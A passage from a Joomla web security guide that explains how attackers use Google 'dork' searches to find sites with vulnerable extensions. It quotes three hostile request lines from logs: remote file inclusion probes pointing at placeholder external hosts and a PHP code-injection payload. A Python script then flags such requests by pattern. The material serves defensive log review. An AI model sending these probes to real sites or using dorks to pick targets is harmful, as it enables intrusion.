Joomla! Web Security

Finding Targets to Attack


A "Dork" is a Google search crafted to locate targets. A target can be as simple as a specific version of an extension, or a device such as a webcam on a specific port.

Let us say a bad guy learns from one of the many exploit or responsible-disclosure sites that an extension is vulnerable. He or she could Google all the targets like this:

inurl:"/com_example/"

In this example, com_example stands for the extension being searched for. Once this search is run, it will yield a lovely list of targets.

This sort of thing happens every time a new exploit is reported. Everyone rushes out to try to break into your site. You want to watch your logs for entries such as these:

http://www.yourdomain.com/index.php?option=com_noticias&Itemid=xcorpitx&task=detalhe&id=http://www.XXXXXX.net/3333/read/test.txt??

/?mosConfig_absolute_path=http://xxxxx.yyyyyyyyyyy.pt/test.txt?

/poll/comments.php?id=%7B$%7Binclude($aaa)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http

These are three examples...
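
One way to flag requests like the three above when reviewing an access log, as an added example that is not from the book. The rule names, the regular expressions, the set of watched parameter names and the fourth (benign) request are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# The three request lines shown above, plus one constructed benign request.
SAMPLE_REQUESTS = [
    "http://www.yourdomain.com/index.php?option=com_noticias&Itemid=xcorpitx"
    "&task=detalhe&id=http://www.XXXXXX.net/3333/read/test.txt??",
    "/?mosConfig_absolute_path=http://xxxxx.yyyyyyyyyyy.pt/test.txt?",
    "/poll/comments.php?id=%7B$%7Binclude($aaa)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http",
    "/index.php?option=com_content&view=article&id=12",  # constructed, benign
]

# A parameter whose value is itself an absolute URL (remote file inclusion probe).
REMOTE_URL = re.compile(r"^\s*(?:https?|ftp)://", re.I)
# PHP variable-expansion or call syntax inside a parameter value.
PHP_CODE = re.compile(r"\$\{|\b(?:include|require|eval|exit|system)\s*\(", re.I)
# Assumption: configuration variables that a request should never supply.
CONFIG_PARAMS = {"mosconfig_absolute_path"}


def classify(request):
    """Return the sorted list of reasons a request line looks hostile."""
    reasons = set()
    query = urlsplit(request).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl decodes once; decode again to catch double-encoded payloads.
        decoded = unquote(value)
        if name.lower() in CONFIG_PARAMS:
            reasons.add("config-variable-override")
        if REMOTE_URL.search(decoded):
            reasons.add("remote-url-in-parameter")
        if PHP_CODE.search(decoded):
            reasons.add("php-code-in-parameter")
    return sorted(reasons)


def scan(requests):
    """Return (request, reasons) pairs for every request that was flagged."""
    flagged = []
    for request in requests:
        reasons = classify(request)
        if reasons:
            flagged.append((request, reasons))
    return flagged


if __name__ == "__main__":
    for request, reasons in scan(SAMPLE_REQUESTS):
        print(", ".join(reasons), "<-", request)
```

A hit means the request was sent, not that it succeeded; check the response status and the extension's version before treating it as a compromise.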